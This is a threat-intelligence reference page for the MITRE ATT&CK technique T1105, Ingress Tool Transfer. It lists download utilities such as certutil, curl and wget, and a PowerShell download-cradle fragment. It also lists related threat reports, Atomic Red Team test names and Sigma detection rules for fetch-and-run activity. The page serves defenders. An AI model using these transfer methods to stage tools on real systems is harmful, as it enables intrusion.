T1105: Ingress Tool Transfer
| View on MITRE ATT&CK | T1105 |
|---|---|
| Tactic(s) | Command and Control |
Data from MITRE ATT&CK®:
Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer).
On Windows, adversaries may use various utilities to download tools, such as copy, finger, certutil, and PowerShell commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget.(Citation: t1105_lolbas)
Adversaries may also abuse installers and package managers, such as yum or winget, to download tools to victim hosts.
Files can also be transferred using various Web Services as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)
© 2024 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.
Cyber Threat Graph Context
Explore how this ATT&CK Technique relates to the wider threat graph
Reporting on this Technique
Suspected APT Actors Leverage Authentication Bypass Techniques and Pulse Secure Zero-Day
Reporting from Mandiant which discusses the exploitation of Pulse Secure VPN devices in 2021 and 12 malware families associated with the campaign. ...
APT40 Advisory - PRC MSS tradecraft in action
This advisory, authored by the Australian Cyber Security Centre and multiple other international cybersecurity agencies, outlines the threat posed ...
Flax Typhoon using legitimate software to quietly access Taiwanese organizations
This blog post by Microsoft Threat Intelligence outlines the Flax Typhoon intrusion set and TTPs demonstrated by the group. It describes the actor ...
KAPEKA A novel backdoor spotted in Eastern Europe
This report from researchers at WithSecure unveils a novel backdoor: 'Kapeka'. Kapeka has been used against victims in Eastern Europe ...
Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation
This blog post by threat researchers at Mandiant outlines intrusions activity by the UNC3886 intrusion set which involved the deployment of ...
Connect:fun Detailing an exploitation campaign targeting FortiClient EMS via CVE-2023-48788
This report from Vedere Labs at Forescout Research details an exploitation campaign which they have designated Connect:fun. The attacks exploit ...
From OneNote to RansomNote: An Ice Cold Intrusion
This case report from The DFIR Report describes an intrusion which started with a malicious OneNote attachment. Opening the OneNote file led to ...
Bringing Access Back — Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect
This blog post by researchers at Mandiant describes how the threat actor UNC5174 exploited vulnerabilities in F5 BIG-IP appliances and Connectwise ...
Earth Krahang Exploits Intergovernmental Trust to Launch Cross-Government Attacks
This article by researchers at Trend Micro discusses an Advanced Persistent Threat (APT) group they name Earth Krahang who have been observed ...
The Updated APT Playbook: Tales from the Kimsuky threat actor group
This article by researchers at Rapid7 discusses recent activity by North Korean intrusion set 'Kimsuky'. Kimsuky is primarily focused on ...
CVE-2024-21412: DarkGate Operators Exploit Microsoft Windows SmartScreen Bypass in Zero-Day Campaign
This report by TrendMicro's Zero Day Initiative describes a campaign associated with the DarkGate ransomware. According to the post, DarkGate ...
StopRansomware: Phobos Ransomware
This is a joint Cybersecurity Advisory produced by CISA, the FBI and the Multi-State Information Sharing and Analysis Center (MS-ISAC). It ...
PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure
Following an initial advisory issued in May 2023, this advisory from CISA, NSA and partners outlines information on the broader campaign of cyber ...
Buzzing on Christmas Eve: Trigona Ransomware in 3 Hours
This report by the DFIR Report outlines a Trigona Ransomware attack. It describes how the actors went from initial access (by exposed RDP) to data ...
Threat Actor Groups, Including Black Basta, are Exploiting Recent ScreenConnect Vulnerabilities
This blog post gives a detailed analysis of two critical vulnerabilities (CVE-2024-1708 and CVE-2024-1709) affecting ConnectWise ScreenConnect ...
Mitigations for this technique
MITRE ATT&CK Mitigations
How to detect this technique
MITRE ATT&CK Data Components
File Creation (File)
Initial construction of a new file (ex: Sysmon EID 11)Network Connection Creation (Network Traffic)
Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)Network Traffic Content (Network Traffic)
Logged network traffic data showing both protocol header and body values (ex: PCAP)Command Execution (Command)
The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. )Network Traffic Flow (Network Traffic)
Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)Control Validation Tests for this Technique
Use Atomic Red Team tests to test your defenses against this technique.
Arbitrary file download using the Notepad++ GUP.exe binary
Nimgrab - Transfer Files
Linux Download File and Run
Download a File with Windows Defender MpCmdRun.exe
Download a file using wscript
certutil download (urlcache)
scp remote file copy (push)
Curl Upload File
scp remote file copy (pull)
sftp remote file copy (push)
certutil download (verifyctl)
Download a file with IMEWDBLD.exe
Windows - PowerShell Download
Curl Download File
Lolbas replace.exe use to copy file
MAZE Propagation Script
Windows - BITSAdmin BITS Download
Download a file with Microsoft Connection Manager Auto-Download
OSTAP Worming Activity
sftp remote file copy (pull)
iwr or Invoke Web-Request download
rsync remote file copy (push)
svchost writing a file to a UNC path
Printer Migration Command-Line Tool UNC share folder into a zip file
Lolbas replace.exe use to copy UNC file
File download with finger.exe on Windows
rsync remote file copy (pull)
whois file download
File Download via PowerShell
certreq download
Sigma Detections for this Technique
Password Protected ZIP File Opened (Suspicious Filenames)
Potential COM Objects Download Cradles Usage - Process Creation
File Download with Headless Browser
PowerShell DownloadFile
Command Line Execution with Suspicious URL and AppData Strings
Suspicious Invoke-WebRequest Execution With DirectIP
Potential Download/Upload Activity Using Type Command
Download File To Potentially Suspicious Directory Via Wget
Microsoft Binary Suspicious Communication Endpoint
PUA - Nimgrab Execution
Suspicious Invoke-WebRequest Execution
File Download via CertOC.EXE
Arbitrary File Download Via GfxDownloadWrapper.EXE
Suspicious Curl.EXE Download
Script Initiated Connection
Script Initiated Connection to Non-Local Network
File Download And Execution Via IEExec.EXE
Suspicious Dropbox API Usage
Remote File Download Via Findstr.EXE
Potential DLL File Download Via PowerShell Invoke-WebRequest
Pandemic Registry Key
File Download From Browser Process Via Inline URL
Remote File Download Via Desktopimgdownldr Utility
Import LDAP Data Interchange Format File Via Ldifde.EXE
Suspicious Desktopimgdownldr Target File
Remote File Copy
Suspicious Diantz Download and Compress Into a CAB File
Potential COM Objects Download Cradles Usage - PS Script
Download from Suspicious Dyndns Hosts
Executable from Webdav
Lolbas OneDriveStandaloneUpdater.exe Proxy Download
Suspicious Download from Office Domain
Network Connection Initiated By IMEWDBLD.EXE
Curl Download And Execute Combination
Suspicious Certreq Command to Download
Finger.exe Suspicious Invocation
Suspicious Curl File Upload - Linux
Curl Usage on Linux
File Download Via Windows Defender MpCmpRun.EXE
Wget Creating Files in Tmp Directory
Replace.exe Usage
Suspicious Extrac32 Execution
Suspicious Program Location with Network Connections
Insensitive Subfolder Search Via Findstr.EXE
File Download From IP Based URL Via CertOC.EXE
Connection Initiated Via Certutil.EXE
File Download Using Notepad++ GUP Utility
MsiExec Web Install
Cisco Stage Data
Potential In-Memory Download And Compile Of Payloads
Suspicious Desktopimgdownldr Command
AppX Package Installation Attempts Via AppInstaller.EXE
PrintBrm ZIP Creation of Extraction
PowerShell Web Download
Browser Execution In Headless Mode
SP800-53 Controls
See which controls can help protect against this MITRE ATT&CK technique. This is based on mappings to associated SP800-53 controls produced by the MITRE Engenuity Center for Threat-Informed Defense.